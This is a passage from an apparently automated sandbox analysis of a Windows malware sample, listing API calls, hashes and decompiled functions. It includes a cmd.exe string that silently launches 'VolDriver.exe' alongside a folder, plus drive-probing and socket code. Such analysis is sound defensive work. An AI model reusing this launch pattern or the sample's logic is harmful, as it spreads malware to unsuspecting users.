                                                                                  0x0040498b
                                                                                  0x00404991
                                                                                  0x004049a3
                                                                                  0x004049a9
                                                                                  0x004049b0
                                                                                  0x004049d6
                                                                                  0x004049f0
                                                                                  0x004049fd
                                                                                  0x00404a03
                                                                                  0x00404a06
                                                                                  0x00404a16
                                                                                  0x00404a2b
                                                                                  0x00404a43
                                                                                  0x00404a4a
                                                                                  0x00404a64
                                                                                  0x00404a72
                                                                                  0x00404a72
                                                                                  0x00000000
                                                                                  0x00404a80
                                                                                  0x00404a85

                                                                                  APIs
                                                                                  • CoInitialize.OLE32(00000000), ref: 0040498B
                                                                                  • CoCreateInstance.OLE32(00410348,00000000,00000001,00410338,?), ref: 004049A3
                                                                                  • wsprintfW.USER32 ref: 004049D6
                                                                                  Strings
                                                                                  • /c start .\%s & start .\%s\VolDriver.exe, xrefs: 004049CA
                                                                                  • %windir%\System32\cmd.exe, xrefs: 004049DF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateInitializeInstancewsprintf
                                                                                  • String ID: %windir%\System32\cmd.exe$/c start .\%s & start .\%s\VolDriver.exe
                                                                                  • API String ID: 2038452267-2473591295
                                                                                  • Opcode ID: 340fd1f3452e10be6b46804f1b08d5f979aa4967310c1d27f755dd35910e8895
                                                                                  • Instruction ID: 67ce22acd86be46554e689b187cabead6fbc8e336e1921382d0bb77877987f96
                                                                                  • Opcode Fuzzy Hash: 340fd1f3452e10be6b46804f1b08d5f979aa4967310c1d27f755dd35910e8895
                                                                                  • Instruction Fuzzy Hash: F431BA75A40208EFCB04DF98C885EDEB7B5EF88704F108299E619A73A5D774AE81CB54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CoInitializeEx.OLE32(00000000,00000002,?,?,00406874), ref: 004057B8
                                                                                  • SysAllocString.OLEAUT32(C:\Users\user\Desktop\Id4zlrsrZ4.exe), ref: 004057C3
                                                                                  • CoUninitialize.OLE32 ref: 004057E8
                                                                                    • Part of subcall function 00405520: SysFreeString.OLEAUT32(00000000), ref: 00405738
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004057E2
                                                                                  Strings
                                                                                  • C:\Users\user\Desktop\Id4zlrsrZ4.exe, xrefs: 004057BE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: String$Free$AllocInitializeUninitialize
                                                                                  • String ID: C:\Users\user\Desktop\Id4zlrsrZ4.exe
                                                                                  • API String ID: 459949847-3281004777
                                                                                  • Opcode ID: b8475d7346bb43be32fa0760030d30944301d8ab8fa8548105178a417464336f
                                                                                  • Instruction ID: ed05d97b5b317eb6b2af260c68b5e38350126176a91c2a59017ff1c3aafa5288
                                                                                  • Opcode Fuzzy Hash: b8475d7346bb43be32fa0760030d30944301d8ab8fa8548105178a417464336f
                                                                                  • Instruction Fuzzy Hash: A8E04875941308FBD700DBE0ED0EB9E7778DB05701F108175F90567291D6B55E80DB59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E004099A0(void* __eax) {
                                                                                  				void* _v8;
                                                                                  				long _v12;
                                                                                  				void* _v16;
                                                                                  				signed int _v20;
                                                                                  				long _v24;
                                                                                  				signed int _t36;
                                                                                  				void* _t38;
                                                                                  				signed int _t65;
                                                                                  
                                                                                  				if( *0x414e84 == 0) {
                                                                                  					return __eax;
                                                                                  				}
                                                                                  				_t36 =  *0x414e84; // 0x0
                                                                                  				_v12 = _t36 << 3;
                                                                                  				_t38 = E00408E60(_v12);
                                                                                  				_v8 = _t38;
                                                                                  				__eflags = _v8;
                                                                                  				if(_v8 != 0) {
                                                                                  					_v20 = 0;
                                                                                  					while(1) {
                                                                                  						__eflags = _v20 -  *0x414e84; // 0x0
                                                                                  						if(__eflags >= 0) {
                                                                                  							break;
                                                                                  						}
                                                                                  						 *((intOrPtr*)(_v8 + _v20 * 8)) =  *((intOrPtr*)( *((intOrPtr*)(0x414e88 + _v20 * 4)) + 4));
                                                                                  						 *((intOrPtr*)(_v8 + 4 + _v20 * 8)) =  *((intOrPtr*)( *((intOrPtr*)(0x414e88 + _v20 * 4)) + 8));
                                                                                  						_t65 = _v20 + 1;
                                                                                  						__eflags = _t65;
                                                                                  						_v20 = _t65;
                                                                                  					}
                                                                                  					_v16 = CreateFileW(0x414c40, 0x40000000, 0, 0, 2, 2, 0);
                                                                                  					__eflags = _v16 - 0xffffffff;
                                                                                  					if(_v16 != 0xffffffff) {
                                                                                  						WriteFile(_v16, _v8, _v12,  &_v24, 0);
                                                                                  						FlushFileBuffers(_v16);
                                                                                  						CloseHandle(_v16);
                                                                                  					}
                                                                                  					InterlockedExchange(0x4133b4, 0x3d);
                                                                                  					return E00408FB0(_v8);
                                                                                  				}
                                                                                  				return _t38;
                                                                                  			}











                                                                                  0x004099ad
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004099b4
                                                                                  0x004099bc
                                                                                  0x004099c3
                                                                                  0x004099cb
                                                                                  0x004099ce
                                                                                  0x004099d2
                                                                                  0x004099d8
                                                                                  0x004099ea
                                                                                  0x004099ed
                                                                                  0x004099f3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409a08
                                                                                  0x00409a1e
                                                                                  0x004099e4
                                                                                  0x004099e4
                                                                                  0x004099e7
                                                                                  0x004099e7
                                                                                  0x00409a3e
                                                                                  0x00409a41
                                                                                  0x00409a45
                                                                                  0x00409a59
                                                                                  0x00409a63
                                                                                  0x00409a6d
                                                                                  0x00409a6d
                                                                                  0x00409a7a
                                                                                  0x00000000
                                                                                  0x00409a89
                                                                                  0x00409a8f

                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(00414C40,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00409A38
                                                                                  • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 00409A59
                                                                                  • FlushFileBuffers.KERNEL32(000000FF), ref: 00409A63
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 00409A6D
                                                                                  • InterlockedExchange.KERNEL32(004133B4,0000003D), ref: 00409A7A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                                  • String ID:
                                                                                  • API String ID: 442028454-0
                                                                                  • Opcode ID: 041b73d5b942429564a4579fd955c60e5901b8d3da01b6d0c2a702c2e683ff31
                                                                                  • Instruction ID: 85340a07573b5f562dbc2fb3f1b8785e1f65b23dd5aeba6ef7127c009f103e88
                                                                                  • Opcode Fuzzy Hash: 041b73d5b942429564a4579fd955c60e5901b8d3da01b6d0c2a702c2e683ff31
                                                                                  • Instruction Fuzzy Hash: A6317AB8A00209EBCB14CF94ED45FAEB3B5FB88300F208169E511A7391D774AE41CF58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 46%
                                                                                  			E004078B0(signed int __edx, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24) {
                                                                                  				signed int _v8;
                                                                                  				signed int _v12;
                                                                                  
                                                                                  				asm("cdq");
                                                                                  				L0040F19E();
                                                                                  				asm("cdq");
                                                                                  				L0040F19E();
                                                                                  				asm("cdq");
                                                                                  				L0040F19E();
                                                                                  				asm("cdq");
                                                                                  				L0040F19E();
                                                                                  				asm("cdq");
                                                                                  				L0040F19E();
                                                                                  				asm("cdq");
                                                                                  				_v12 = _a4 | _a8 | _a12 | _a16 | _a20 | _a24;
                                                                                  				_v8 = __edx | __edx | __edx | __edx | __edx | __edx;
                                                                                  				return _v12;
                                                                                  			}





                                                                                  0x004078bb
                                                                                  0x004078be
                                                                                  0x004078ca
                                                                                  0x004078cd
                                                                                  0x004078d9
                                                                                  0x004078dc
                                                                                  0x004078e8
                                                                                  0x004078eb
                                                                                  0x004078f7
                                                                                  0x004078fa
                                                                                  0x00407906
                                                                                  0x0040790b
                                                                                  0x0040790e
                                                                                  0x0040791c

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _allshl
                                                                                  • String ID:
                                                                                  • API String ID: 435966717-0
                                                                                  • Opcode ID: 1cbd3f30f7551ee80999496264fe97a3fccce00ee31e34d742f1e9c4e4257bfe
                                                                                  • Instruction ID: 50bcbbfbc9b263382ea6c403a771187ef31099e9fa81d89d9fbd392b00d1843e
                                                                                  • Opcode Fuzzy Hash: 1cbd3f30f7551ee80999496264fe97a3fccce00ee31e34d742f1e9c4e4257bfe
                                                                                  • Instruction Fuzzy Hash: CDF08132A01028EB8720EEEFC4428CAF7E69F88364B118136F818E7660E9709C1547F2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040E0A0(intOrPtr* __ebx, void* __edi) {
                                                                                  				void* _t8;
                                                                                  				intOrPtr* _t18;
                                                                                  				intOrPtr _t23;
                                                                                  				intOrPtr _t26;
                                                                                  				void* _t28;
                                                                                  
                                                                                  				_t18 = __ebx;
                                                                                  				if(__ebx != 0 &&  *__ebx == 0x756470) {
                                                                                  					SetEvent( *(__ebx + 0x10));
                                                                                  					WaitForSingleObject( *(__ebx + 0x14), 0xffffffff);
                                                                                  					CloseHandle( *(__ebx + 0x14));
                                                                                  					_t26 =  *((intOrPtr*)(__ebx + 0x20));
                                                                                  					if(_t26 == 0) {
                                                                                  						L6:
                                                                                  						E00409940( *((intOrPtr*)(_t18 + 8)));
                                                                                  						return E00408FB0(_t18);
                                                                                  					}
                                                                                  					do {
                                                                                  						E00408FB0( *((intOrPtr*)(_t26 + 0x18)));
                                                                                  						_t23 =  *((intOrPtr*)(_t26 + 0x1c));
                                                                                  						E00408FB0(_t26);
                                                                                  						_t28 = _t28 + 8;
                                                                                  						_t26 = _t23;
                                                                                  					} while (_t23 != 0);
                                                                                  					goto L6;
                                                                                  				}
                                                                                  				return _t8;
                                                                                  			}








                                                                                  0x0040e0a0
                                                                                  0x0040e0a2
                                                                                  0x0040e0b1
                                                                                  0x0040e0bd
                                                                                  0x0040e0c7
                                                                                  0x0040e0cd
                                                                                  0x0040e0d2
                                                                                  0x0040e0f1
                                                                                  0x0040e0f5
                                                                                  0x00000000
                                                                                  0x0040e103
                                                                                  0x0040e0d5
                                                                                  0x0040e0d9
                                                                                  0x0040e0de
                                                                                  0x0040e0e2
                                                                                  0x0040e0e7
                                                                                  0x0040e0ea
                                                                                  0x0040e0ec
                                                                                  0x00000000
                                                                                  0x0040e0f0
                                                                                  0x0040e104

                                                                                  APIs
                                                                                  • SetEvent.KERNEL32(?,?,0040E195,?,?,0040C2CE,00000000), ref: 0040E0B1
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,0040E195,?,?,0040C2CE,00000000), ref: 0040E0BD
                                                                                  • CloseHandle.KERNEL32(?,?,0040E195,?,?,0040C2CE,00000000), ref: 0040E0C7
                                                                                    • Part of subcall function 00408FB0: HeapFree.KERNEL32(00000000,00000000,00401192,?,00401192,?), ref: 0040900B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                                  • String ID: pdu
                                                                                  • API String ID: 309973729-2320407122
                                                                                  • Opcode ID: 66e9fe8601b7ef7cd0dbcf15949e6a0ec0c00c685c3ab46f0f111c3b43d568d8
                                                                                  • Instruction ID: f8868823fc7079781ad89b5054c4351009e6be9a29e70cb83faf709a4bea03a0
                                                                                  • Opcode Fuzzy Hash: 66e9fe8601b7ef7cd0dbcf15949e6a0ec0c00c685c3ab46f0f111c3b43d568d8
                                                                                  • Instruction Fuzzy Hash: 7FF0C2B64002209BCB209F66EC84D577779AE843203044A7EFD516B38ACE78EC51C7A9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E004047E0(WCHAR* _a4) {
                                                                                  				int _v8;
                                                                                  				short _v1052;
                                                                                  				intOrPtr _v1056;
                                                                                  
                                                                                  				_v8 = GetDriveTypeW(_a4);
                                                                                  				_v1056 = _v8;
                                                                                  				if(_v1056 >= 2) {
                                                                                  					if(_v1056 <= 3 || _v1056 == 6) {
                                                                                  						if(QueryDosDeviceW(_a4,  &_v1052, 0x208) != 0 && StrCmpNW( &_v1052, L"\\??\\", 4) == 0) {
                                                                                  							_v8 = 1;
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				return _v8;
                                                                                  			}






                                                                                  0x004047f3
                                                                                  0x004047f9
                                                                                  0x00404806
                                                                                  0x0040480f
                                                                                  0x00404834
                                                                                  0x0040484e
                                                                                  0x0040484e
                                                                                  0x00404834
                                                                                  0x0040480f
                                                                                  0x0040485b

                                                                                  APIs
                                                                                  • GetDriveTypeW.KERNEL32(0040489F), ref: 004047ED
                                                                                  • QueryDosDeviceW.KERNEL32(0040489F,?,00000208), ref: 0040482C
                                                                                  • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00404844
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DeviceDriveQueryType
                                                                                  • String ID: \??\
                                                                                  • API String ID: 1681518211-3047946824
                                                                                  • Opcode ID: 2b4ad6813e30ca617d8286429adeb6bd2046491341813551861da181f93699b6
                                                                                  • Instruction ID: 5abcc523fc43e3b538995df9ae9ab9c5832e94dc02c2deabd9e765cd8bb00b71
                                                                                  • Opcode Fuzzy Hash: 2b4ad6813e30ca617d8286429adeb6bd2046491341813551861da181f93699b6
                                                                                  • Instruction Fuzzy Hash: 2D01FFB594020CEBCF20EF95CD497D977B8AB44704F00C4BAAB18A7290D6799AC5CF98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040D530(char _a4) {
                                                                                  				long _v8;
                                                                                  				void* _v12;
                                                                                  
                                                                                  				_v8 = 0;
                                                                                  				_t2 =  &_a4; // 0x4050e0
                                                                                  				_v12 = CreateFileW( *_t2, 0x80000000, 1, 0, 3, 0, 0);
                                                                                  				if(_v12 != 0xffffffff) {
                                                                                  					_v8 = GetFileSize(_v12, 0);
                                                                                  					CloseHandle(_v12);
                                                                                  				}
                                                                                  				return _v8;
                                                                                  			}





                                                                                  0x0040d536
                                                                                  0x0040d54c
                                                                                  0x0040d556
                                                                                  0x0040d55d
                                                                                  0x0040d56b
                                                                                  0x0040d572
                                                                                  0x0040d572
                                                                                  0x0040d57e

                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(P@,80000000,00000001,00000000,00000003,00000000,00000000,004050E0), ref: 0040D550
                                                                                  • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040D565
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040D572
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandleSize
                                                                                  • String ID: P@
                                                                                  • API String ID: 1378416451-676759640
                                                                                  • Opcode ID: bc44828a6da30a9cad1c5fe3b81ddf2eba58198aecc4cfa5820a2fec73a274a6
                                                                                  • Instruction ID: ef73fbcfdb561ef279eb64d7b78e57dedde01b6ae7d936de3e3fbaf211c6e608
                                                                                  • Opcode Fuzzy Hash: bc44828a6da30a9cad1c5fe3b81ddf2eba58198aecc4cfa5820a2fec73a274a6
                                                                                  • Instruction Fuzzy Hash: A5F01C74A40308FBDB20DFA4DC49F9D7BB4AB08711F208294FA447B2C0D6B56A808B48
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 64%
                                                                                  			E0040DE70(char* __edx, intOrPtr _a4) {
                                                                                  				short _v18;
                                                                                  				short _v22;
                                                                                  				short _v26;
                                                                                  				short _v28;
                                                                                  				short _v30;
                                                                                  				char _v32;
                                                                                  				char _v36;
                                                                                  				intOrPtr _v40;
                                                                                  				intOrPtr _v44;
                                                                                  				char _v56;
                                                                                  				intOrPtr _v68;
                                                                                  				char* _t23;
                                                                                  				short _t26;
                                                                                  				long _t29;
                                                                                  				short _t34;
                                                                                  				intOrPtr _t37;
                                                                                  				intOrPtr _t43;
                                                                                  				long _t47;
                                                                                  				signed int _t48;
                                                                                  				void* _t50;
                                                                                  
                                                                                  				_t40 = __edx;
                                                                                  				_t50 = (_t48 & 0xfffffff8) - 0x1c;
                                                                                  				_t34 = 0;
                                                                                  				_t43 = _a4;
                                                                                  				_v28 = 0;
                                                                                  				do {
                                                                                  					_t23 =  &_v32;
                                                                                  					_v32 = 0;
                                                                                  					__imp__#10( *(_t43 + 8), 0x4004667f, _t23);
                                                                                  					if(_t23 == 0xffffffff) {
                                                                                  						break;
                                                                                  					}
                                                                                  					_t37 = _v44;
                                                                                  					if(_t37 != 0) {
                                                                                  						if(_t34 == 0 || _v40 < _t37) {
                                                                                  							_v40 = _t37;
                                                                                  							_t26 = E00408EA0(_t37, _t40, _t34, _t37);
                                                                                  							_t37 = _v44;
                                                                                  							_t50 = _t50 + 8;
                                                                                  							_t34 = _t26;
                                                                                  						}
                                                                                  						_v30 = 0;
                                                                                  						_v26 = 0;
                                                                                  						_v22 = 0;
                                                                                  						_v18 = 0;
                                                                                  						_t29 =  *(_t43 + 8);
                                                                                  						_v32 = 0;
                                                                                  						_t40 =  &_v32;
                                                                                  						_v36 = 0x10;
                                                                                  						__imp__#17(_t29, _t34, _t37, 0,  &_v32,  &_v36);
                                                                                  						_t47 = _t29;
                                                                                  						if(_t47 != 0xffffffff && _t47 != 0) {
                                                                                  							InterlockedExchangeAdd(_t43 + 0x18, _t47);
                                                                                  							_t40 =  &_v56;
                                                                                  							E0040DD40(_t43, _t34, _t47, _v68,  &_v56);
                                                                                  							_t50 = _t50 + 0x14;
                                                                                  						}
                                                                                  					}
                                                                                  				} while (WaitForSingleObject( *(_t43 + 0x10), 1) == 0x102);
                                                                                  				return E00408FB0(_t34);
                                                                                  			}























                                                                                  0x0040de70
                                                                                  0x0040de76
                                                                                  0x0040de7b
                                                                                  0x0040de7e
                                                                                  0x0040de81
                                                                                  0x0040de85
                                                                                  0x0040de88
                                                                                  0x0040de93
                                                                                  0x0040de9b
                                                                                  0x0040dea4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040deaa
                                                                                  0x0040deb0
                                                                                  0x0040deb8
                                                                                  0x0040dec2
                                                                                  0x0040dec6
                                                                                  0x0040decb
                                                                                  0x0040decf
                                                                                  0x0040ded2
                                                                                  0x0040ded2
                                                                                  0x0040ded8
                                                                                  0x0040dedc
                                                                                  0x0040dee0
                                                                                  0x0040dee4
                                                                                  0x0040deee
                                                                                  0x0040def1
                                                                                  0x0040def6
                                                                                  0x0040df00
                                                                                  0x0040df08
                                                                                  0x0040df0e
                                                                                  0x0040df13
                                                                                  0x0040df1e
                                                                                  0x0040df28
                                                                                  0x0040df31
                                                                                  0x0040df36
                                                                                  0x0040df36
                                                                                  0x0040df13
                                                                                  0x0040df45
                                                                                  0x0040df5f

                                                                                  APIs
                                                                                  • ioctlsocket.WS2_32 ref: 0040DE9B
                                                                                  • recvfrom.WS2_32 ref: 0040DF08
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040DF1E
                                                                                  • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040DF3F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                                  • String ID:
                                                                                  • API String ID: 3980219359-0
                                                                                  • Opcode ID: 417089ecdd77fb733dbf3dacbd9a690ae54b466f088ab91cb1b16bb4ccf47cfd
                                                                                  • Instruction ID: 6c80b279ed5ca581be7c80171f6d45ff8cd2583a00b65cb27f0af65c826a2fd4
                                                                                  • Opcode Fuzzy Hash: 417089ecdd77fb733dbf3dacbd9a690ae54b466f088ab91cb1b16bb4ccf47cfd
                                                                                  • Instruction Fuzzy Hash: 252181B1504301AFD304DF65D884A6BB7E9EFD4314F008A3EF859D2280E774D9488BAA
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 29%
                                                                                  			E0040EDD0(char _a4) {
                                                                                  				long _v4;
                                                                                  				struct _OVERLAPPED* _v8;
                                                                                  				long _v12;
                                                                                  				void* __ebx;
                                                                                  				signed int _t31;
                                                                                  				signed int _t32;
                                                                                  				signed int _t36;
                                                                                  				struct _OVERLAPPED* _t38;
                                                                                  				long _t43;
                                                                                  				char _t51;
                                                                                  				struct _OVERLAPPED* _t52;
                                                                                  				long* _t54;
                                                                                  
                                                                                  				_t54 =  &_v12;
                                                                                  				_t51 = _a4;
                                                                                  				_t52 = 0;
                                                                                  				_v4 = 0;
                                                                                  				_v12 = 0;
                                                                                  				_v8 = 0;
                                                                                  				_t31 = GetQueuedCompletionStatus( *(_t51 + 8),  &_v4,  &_v12,  &_v8, 0xffffffff);
                                                                                  				_t43 = _v12;
                                                                                  				_t32 = _t31 & 0xffffff00 | _t31 != 0x00000000;
                                                                                  				if(_t43 == 0) {
                                                                                  					return _t32;
                                                                                  				}
                                                                                  				do {
                                                                                  					if(_t32 == 0) {
                                                                                  						_t38 =  *((intOrPtr*)(_t43 + 0x260));
                                                                                  						__imp__WSAGetOverlappedResult(_t38, _v8,  &_v4, 0,  &_a4);
                                                                                  						if(_t38 == 0) {
                                                                                  							__imp__#111();
                                                                                  							_t52 = _t38;
                                                                                  						}
                                                                                  					}
                                                                                  					_push(_t52);
                                                                                  					E0040EBE0(_v8, _v4, _v12);
                                                                                  					_t54 =  &(_t54[1]);
                                                                                  					_t52 = 0;
                                                                                  					_v4 = 0;
                                                                                  					_v12 = 0;
                                                                                  					_v8 = 0;
                                                                                  					_t36 = GetQueuedCompletionStatus( *(_t51 + 8),  &_v4,  &_v12,  &_v8, 0xffffffff);
                                                                                  					_t43 = _v12;
                                                                                  					_t32 = _t36 & 0xffffff00 | _t36 != 0x00000000;
                                                                                  				} while (_t43 != 0);
                                                                                  				return _t32;
                                                                                  			}















                                                                                  0x0040edd0
                                                                                  0x0040eddc
                                                                                  0x0040edf3
                                                                                  0x0040edf7
                                                                                  0x0040edfb
                                                                                  0x0040edff
                                                                                  0x0040ee03
                                                                                  0x0040ee05
                                                                                  0x0040ee0b
                                                                                  0x0040ee10
                                                                                  0x0040ee8f
                                                                                  0x0040ee8f
                                                                                  0x0040ee13
                                                                                  0x0040ee15
                                                                                  0x0040ee27
                                                                                  0x0040ee2f
                                                                                  0x0040ee37
                                                                                  0x0040ee39
                                                                                  0x0040ee3f
                                                                                  0x0040ee3f
                                                                                  0x0040ee37
                                                                                  0x0040ee4d
                                                                                  0x0040ee4e
                                                                                  0x0040ee53
                                                                                  0x0040ee69
                                                                                  0x0040ee6d
                                                                                  0x0040ee71
                                                                                  0x0040ee75
                                                                                  0x0040ee79
                                                                                  0x0040ee7b
                                                                                  0x0040ee81
                                                                                  0x0040ee84
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 0040EE03
                                                                                  • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 0040EE2F
                                                                                  • WSAGetLastError.WS2_32 ref: 0040EE39
                                                                                  • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 0040EE79
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
